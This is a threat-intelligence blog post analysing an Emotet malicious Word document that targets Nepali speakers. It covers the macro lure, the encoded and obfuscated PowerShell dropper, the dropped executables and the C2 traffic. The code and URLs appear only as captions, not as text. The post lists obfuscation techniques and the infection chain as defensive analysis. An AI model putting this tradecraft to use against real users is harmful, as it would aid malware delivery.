Analysis: Emotet in Nepal

milann shrestha
4 min readSep 1, 2020


So this morning, I saw a post from hiro_ of an Emotet doc in Nepali. Being a Security Researcher in Nepal, I was very keen to look at it. So, I thought of writing a blog about its basic static analysis.

Twitter Posts by hiro

I call it an campaign targeting specific country. Previously, I have seen emotet actor targeting people speaking Japanese and Italian. Likewise, this maldoc is crafted for Nepali talking people. The actor simply translate “Invoice” or “Info” in Nepali language ie. “जानकारी”. The main highlight of this maldoc is theme its carrying and specified target.

Overhauling the doc, it follows the latest theme inside that was changed last week and named as “red_dawn” with reference to the red banner in the file. As usual, the emotet gang wants the victim to “Enable Content”. You know the Macro Stuffs.. Lets do that,

Emotet Doc with red_dawn theme

Note: I am running these malicious files in my virtual box as a sandbox. So, I shall not fear to get infected.

Monitoring the process from procmon, we notice the powersheLL.exe (PID 7388) with some huge encoded values.

Tracking powershell.exe from procmon

Analyzing the values, the encoding algorithm seems to be Base64. Therefore, following is the decoded and yet obfuscated powershell script used to perform its malicious task. This , obfuscation technique was first noticed last week here. Ivan keeps changing it actively though.

Obfuscated powershell script

Cleaning up the junks from above, we get following full phased script.

Cleaned powershell script

Following are the technique for obfuscation used:
* Random declaration of variables,
* Random Variables Name,
* String using concatenation where not necessary,
* Use of split to create array dynamically,
* Massive use of concatenation for URL,

Thus, extracting URLs from the script we can list out following dropper link,


Letting the Fiddler do its job (make sure network adapter is turned off) the same list of url were attempted to connect by the powershell.

Collecting dropper link from fiddler (dynamic analysis)

The report from AnyRun sandbox shows following process graph where two executable are dropped. ie. J2meDvSHjK.exe and efsutill.exe.

Process Graph by Any Run

As mentioned, we get two executable which in fact has same binary in a different path and with different name. Auto execution of the first executable calls for new file to different path while it delete itself. Imports from kernel.dll such as CreateFile, DeleteFile, TerminateProcess, CreateThread etc. can certainly makes sense.

Side by side comparison of two executable in CFF explorer

Executing the exe in my test environment, it send a POST request to its multiple C2.

POST requests to C2 in Fiddler
MITRE ATT&CK® framework for mapping malware activity

Furthermore, mapping it to the MITRE ATT&CK® framework from hybrid-analysis, we suspect the dropped malware could be possible info-stealer.

Concluding this blog, the Emotet actor has now started targeting Nepal with respect to preferred language, Nepali. But, interestingly the malware carried by the maldoc seem to be similar family. Since, initial access of Emotet is spear-phishing with various sneaky method such as Email Reply Chain method, to prevent it as a first line of defense, any kind of attachment (.docs, .xls, pdf), link, and link embedded pictures from unauthorized source/sender, is considered suspicious. Since, the malware dropped by Emotet Trojan can result in top level cyber threat, Ransomware, we must take this cyber threat campaign seriously.



More at:




milann shrestha

security researcher / threat intel / osint / analyst / anti phishing